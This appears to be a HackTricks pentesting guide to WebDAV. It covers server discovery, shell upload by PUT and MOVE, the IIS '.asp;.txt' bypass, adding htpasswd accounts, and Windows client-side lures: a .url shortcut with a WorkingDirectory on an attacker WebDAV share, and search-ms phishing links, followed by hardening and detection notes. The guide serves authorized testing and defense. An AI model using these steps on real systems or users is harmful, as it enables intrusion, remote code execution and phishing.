put-method-webdav.md (14642B)
1 --- 2 title: "WebDAV" 3 section: "Network Services" 4 sectionSlug: "network-services-pentesting" 5 sourcePath: "src/network-services-pentesting/pentesting-web/put-method-webdav.md" 6 sourceUrl: "https://github.com/HackTricks-wiki/hacktricks/blob/188de82beb54e70956b2952367a0af91d26758b8/src/network-services-pentesting/pentesting-web/put-method-webdav.md" 7 sha: "188de82beb54e70956b2952367a0af91d26758b8" 8 isIndex: false 9 modified: true 10 license: "CC-BY-NC-4.0" 11 --- 12 13 # WebDAV 14 15 When an **HTTP server with WebDAV** exposes write-capable collections, an authorized principal may create, copy, move, or delete resources according to the server's access controls. Authentication may use Basic, Digest, NTLM/Kerberos, client certificates, or an application-specific mechanism; Basic is common in labs but is not required by WebDAV. If a writable collection is also mapped to a server-side script engine, an uploaded file may become code execution.<sup>[[1]](#references)[[5]](#references)</sup> 16 17 Access normally requires **valid credentials**. During an authorized assessment, test the applicable authentication scheme and lockout policy; the [HTTP Basic authentication testing notes](https://github.com/HackTricks-wiki/hacktricks/blob/188de82beb54e70956b2952367a0af91d26758b8/src/generic-hacking/brute-force.md#http-basic-auth) apply only when Basic is actually offered. 18 19 ## Discovery and write-capability verification 20 21 Start with `OPTIONS`, but treat `Allow`/`Public` headers only as an implementation hint: a method can be advertised but denied to the current principal, hidden from the header yet routed by another component, or permitted only below a particular collection. Nmap's `http-webdav-scan` combines `OPTIONS` with `PROPFIND` and may also expose internal names returned in DAV XML.<sup>[[6]](#references)</sup> 22 23 ```bash 24 nmap -p80,443 --script http-webdav-scan \ 25 --script-args http-webdav-scan.path='/dav/' <target> 26 curl -isku 'user:password' -X OPTIONS 'https://target.example/dav/' 27 curl -isku 'user:password' -X PROPFIND -H 'Depth: 0' \ 28 -H 'Content-Type: application/xml' --data '<?xml version="1.0"?><propfind xmlns="DAV:"><prop><resourcetype/><getcontenttype/><getetag/></prop></propfind>' \ 29 'https://target.example/dav/' 30 curl -isku 'user:password' -X PROPFIND -H 'Depth: 1' \ 31 'https://target.example/dav/' 32 ``` 33 34 `Depth: 0` fingerprints one resource and `Depth: 1` enumerates its immediate children; a successful response is normally `207 Multi-Status`, so parse the per-resource `<status>` elements rather than relying only on the outer status. Avoid `Depth: infinity` on production trees because recursive traversal can be expensive.<sup>[[5]](#references)</sup> 35 36 Test each write primitive with a unique marker in a disposable collection. `Overwrite: F` prevents `COPY`/`MOVE` from replacing an existing destination; `201` usually means creation, `204` means an existing destination was overwritten, and `412` is expected when overwrite was refused. Always GET/PROPFIND the destination and compare the bytes instead of trusting a client's summary.<sup>[[5]](#references)</sup> 37 38 ```bash 39 base='https://target.example/dav'; auth='user:password'; n="ht-$RANDOM" 40 printf 'webdav-marker\n' > "/tmp/$n.txt" 41 curl -isku "$auth" -X PUT --data-binary @"/tmp/$n.txt" "$base/$n.txt" 42 curl -isku "$auth" -X COPY -H "Destination: $base/$n.copy" -H 'Overwrite: F' "$base/$n.txt" 43 curl -isku "$auth" -X MOVE -H "Destination: $base/$n.moved" -H 'Overwrite: F' "$base/$n.copy" 44 curl -sku "$auth" "$base/$n.moved"; curl -isku "$auth" -X PROPFIND -H 'Depth: 0' "$base/$n.moved" 45 curl -isku "$auth" -X DELETE "$base/$n.moved"; curl -isku "$auth" -X DELETE "$base/$n.txt" 46 ``` 47 48 To overcome restrictions on file uploads, especially those preventing the execution of server-side scripts, you might: 49 50 - **Upload** files with **executable extensions** directly if not restricted. 51 - **Rename** uploaded non-executable files (like .txt) to an executable extension. 52 - **Copy** uploaded non-executable files, changing their extension to one that is executable. 53 54 ## DavTest 55 56 **DAVTest** attempts to upload files with several extensions and checks whether the resulting resources are accessible or executed: 57 58 ```bash 59 davtest [-auth user:password] -move -sendbd auto -url http://<IP> # Upload .txt files and try to move them to other extensions 60 davtest [-auth user:password] -sendbd auto -url http://<IP> #Try to upload every extension 61 ``` 62 63 Output sample: 64 65  66 67 A successful access test for **`.txt`** or **`.html`** does not mean the server executes those extensions; it only proves that the files are retrievable. 68 69 ## Cadaver 70 71 Cadaver is an interactive WebDAV client for manually uploading, moving, copying, and deleting resources. 72 73 ```text 74 cadaver <IP> 75 ``` 76 77 ## PUT request 78 79 ```text 80 curl -T 'shell.txt' "http://$ip/" 81 ``` 82 83 ## MOVE request 84 85 ```bash 86 curl -X MOVE --header "Destination: http://$ip/shell.php" "http://$ip/shell.txt" 87 ``` 88 89 ## Verb-specific path normalization and authorization 90 91 WebDAV expands one endpoint into several filesystem operations, so test canonicalization and authorization **per verb**, not only with `GET`. Compare slash, backslash, encoded separator, duplicate separator, and dot-segment handling with a client that preserves the request target (for example, `curl --path-as-is`). Keep probes inside a sacrificial collection until the behavior is understood.<sup>[[5]](#references)[[7]](#references)</sup> 92 93 A useful case study is the PaperCut WebDAV chain disclosed in 2024: a third-party servlet sanitized forward slashes, while Jetty passed backslashes and Windows interpreted them as separators. The mismatch made traversed `PROPFIND`, `PUT`, and `DELETE` operations possible even though a separate filter blocked `GET`. This illustrates why a GET-only security filter does not protect a DAV namespace.<sup>[[7]](#references)</sup> 94 95 ```bash 96 # Compare responses; substitute a harmless in-scope collection and marker. 97 base='https://target.example/dav'; auth='user:password' 98 curl --path-as-is -isku "$auth" -X PROPFIND -H 'Depth: 0' "$base/a/../probe" 99 curl --path-as-is -isku "$auth" -X PROPFIND -H 'Depth: 0' "$base/a%5c..%5cprobe" 100 curl --path-as-is -isku "$auth" -X PROPFIND -H 'Depth: 0' "$base/a\\..\\probe" 101 ``` 102 103 `COPY` and `MOVE` have **two authorization targets**: the Request-URI source and the `Destination` URI. Test that normalization, tenant boundaries, and access control are applied to both, and compare absolute-URI and same-origin destination forms accepted by the deployment. Use `Overwrite: F` and unique names while testing to prevent unintended replacement.<sup>[[5]](#references)</sup> 104 105 Hardening should disable unused DAV verbs, keep writable DAV storage outside executable web roots, reject ambiguous separators before routing, authorize only after a single canonicalization step, and enforce the same containment rules on the source and destination. Limit recursive `PROPFIND`, XML body size, upload size, and storage quota to reduce denial-of-service impact.<sup>[[5]](#references)[[7]](#references)</sup> 106 107 ## IIS5/6 WebDav Vulnerability 108 109 Historical IIS 5/6 deployments could combine WebDAV extension filtering with wildcard ASP mappings in a way that rejected a direct `.asp` upload but treated a name such as `.asp;.txt` as executable ASP. This depends on obsolete IIS/script-map configuration and should not be expected on current IIS.<sup>[[5]](#references)</sup> 110 111 In a vulnerable lab, upload the payload as `.txt`, then copy or move it to an `.asp;.txt` name and request that resource. Some clients may report the MOVE as failed even though the destination was created, so verify with `PROPFIND` or a subsequent GET rather than trusting one status display. 112 113  114 115 ## Post credentials 116 117 After obtaining authorized host access to an Apache WebDAV server, inspect its enabled virtual-host configuration. A common path is:\ 118 _**/etc/apache2/sites-enabled/000-default**_ 119 120 Inside it you could find something like: 121 122 ```text 123 ServerAdmin webmaster@localhost 124 Alias /webdav /var/www/webdav 125 <Directory /var/www/webdav> 126 DAV On 127 AuthType Digest 128 AuthName "webdav" 129 AuthUserFile /etc/apache2/users.password 130 Require valid-user 131 ``` 132 133 The `AuthUserFile` directive identifies the password file used for this directory: 134 135 ```text 136 /etc/apache2/users.password 137 ``` 138 139 Such files contain usernames and password verifiers, not plaintext passwords. Preserve permissions and crack or modify them only within the engagement scope. 140 141 With authorization, you can audit a verifier or add/update an account: 142 143 ```bash 144 htpasswd /etc/apache2/users.password <USERNAME> #You will be prompted for the password 145 ``` 146 147 To check if the new credentials are working you can do: 148 149 ```bash 150 wget --user <USERNAME> --ask-password http://domain/path/to/webdav/ -O - -q 151 ``` 152 153 ## Client-side WebDAV delivery and execution 154 155 WebDAV is also useful on the **client side**: Windows can treat a remote WebDAV location as a **working directory**, an **Explorer search location**, or a **document lure** instead of only as a server-side upload target. Common remote path forms are ordinary UNC paths and WebDAV-specific paths such as `\\host@80\share` or `\\host@ssl@443\DavWWWRoot\share`. When Windows resolves them it will usually start the **WebClient** service and generate **`davclnt.dll`** network traffic.<sup>[[2]](#references)</sup> 156 157 ### Internet Shortcut (`.url`) + remote `WorkingDirectory` 158 159 An Internet Shortcut can launch a **local signed binary** while forcing its **current working directory** to an attacker-controlled WebDAV share. If that parent process later starts a child **by bare filename** (for example `route.exe` instead of `C:\Windows\System32\route.exe`), Windows may resolve and execute the remote file from WebDAV first. 160 161 This was highlighted by **CVE-2025-33053**. Patched Windows releases address the documented chain, but the general audit lesson remains: a binary that resolves children or dependencies from an attacker-controlled working directory can become a remote search-path execution gadget.<sup>[[3]](#references)[[4]](#references)</sup> 162 163 ```ini 164 [InternetShortcut] 165 URL=C:\Program Files\Internet Explorer\iediagcmd.exe 166 WorkingDirectory=\\attacker@ssl@443\DavWWWRoot\share 167 ShowCommand=7 168 IconFile=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe 169 IconIndex=13 170 ``` 171 172 Abuse notes: 173 174 - The remote payload must use the **exact** child/dependency name requested by the parent (`route.exe`, `netsh.exe`, `ping.exe`, etc.). 175 - Good candidates are binaries that **run without mandatory arguments** and later call `ShellExecute`/`CreateProcess` with a **bare name**. If the binary uses a **fully qualified path**, the working-directory substitution normally fails. 176 - `ShowCommand=7` starts the signed binary minimized, while `IconFile` and `IconIndex` can make the `.url` look like a PDF/browser/document shortcut. 177 - This is a remote variant of **search-path hijacking**: conceptually similar to [DLL hijacking / weak search-path issues](/hacktricks/windows-hardening/windows-local-privilege-escalation/dll-hijacking/overview), but with the attacker-controlled search location hosted over WebDAV. 178 179 For lab discovery, create several `.url` files that all point their `WorkingDirectory` to the same WebDAV share, then upload harmless test executables named after likely child processes/dependencies. Any shortcut that launches the remote test binary identifies another candidate LOLBin. 180 181 ### `search-ms:` and `.library-ms` WebDAV/UNC lures 182 183 Instead of downloading a file directly, a phishing page can make **Explorer** render a remote WebDAV directory as search results: 184 185 ```text 186 search-ms:displayname=Search Results in \\attacker@80\Downloads\Docs&query=*.scr&crumb=location:\\attacker@80\Downloads\Docs 187 ``` 188 189 This makes the remote file look like an **Explorer result** instead of a normal browser download. Operators commonly combine this with:<sup>[[2]](#references)</sup> 190 191 - **RTLO / `U+202E`** 192 - **Double extensions** such as `report.pdf.scr` 193 - **Whitespace padding** before `.exe`/`.scr` 194 - **Fake PDF / Office / browser icons** 195 196 Similar delivery can use **`.library-ms`** files that point to external UNC/WebDAV locations. For more general document-lure ideas see [Phishing Files & Documents](https://github.com/HackTricks-wiki/hacktricks/blob/188de82beb54e70956b2952367a0af91d26758b8/src/generic-methodologies-and-resources/phishing-methodology/phishing-documents.md), and for the **NTLM-leak** side of `.library-ms` / shortcut abuse see [Places to steal NTLM creds](/hacktricks/windows-hardening/ntlm/places-to-steal-ntlm-creds). 197 198 ### Detection ideas 199 200 - `.url` files containing `WorkingDirectory=\\\\...@80\\`, `@ssl@443`, or `DavWWWRoot` 201 - **WebClient** service start events followed by **`davclnt.dll`** network activity 202 - Trusted Windows binaries spawning children whose **image path** is a **UNC/WebDAV** location 203 - Explorer/browser activity that immediately opens **`search-ms:`** or **`.library-ms`** references to external shares 204 - Remote executables masquerading as documents via **RTLO**, **double extensions**, or **long whitespace padding**<sup>[[2]](#references)</sup> 205 206 207 ## References 208 209 - [1] [Exploiting WebDAV](https://vk9-sec.com/exploiting-webdav/) 210 - [2] [Rapid7 - Inside an Exposed Malware Delivery Lab: OPSEC Failures Behind a WebDAV Phishing Operation](https://www.rapid7.com/blog/post/tr-exposed-webdav-malware-delivery-lab-analysis/) 211 - [3] [NVD - CVE-2025-33053](https://nvd.nist.gov/vuln/detail/CVE-2025-33053) 212 - [4] [Stealth Falcon's Exploit of Microsoft Zero Day Vulnerability - Check Point Research](https://research.checkpoint.com/2025/stealth-falcon-zero-day/) 213 - [5] [RFC 4918 - HTTP Extensions for Web Distributed Authoring and Versioning (WebDAV)](https://www.rfc-editor.org/rfc/rfc4918) 214 - [6] [Nmap `http-webdav-scan` NSE documentation](https://nmap.org/nsedoc/scripts/http-webdav-scan.html) 215 - [7] [Writeup for CVE-2023-39143: PaperCut WebDAV Vulnerability](https://horizon3.ai/attack-research/disclosures/writeup-for-cve-2023-39143-papercut-webdav-vulnerability/)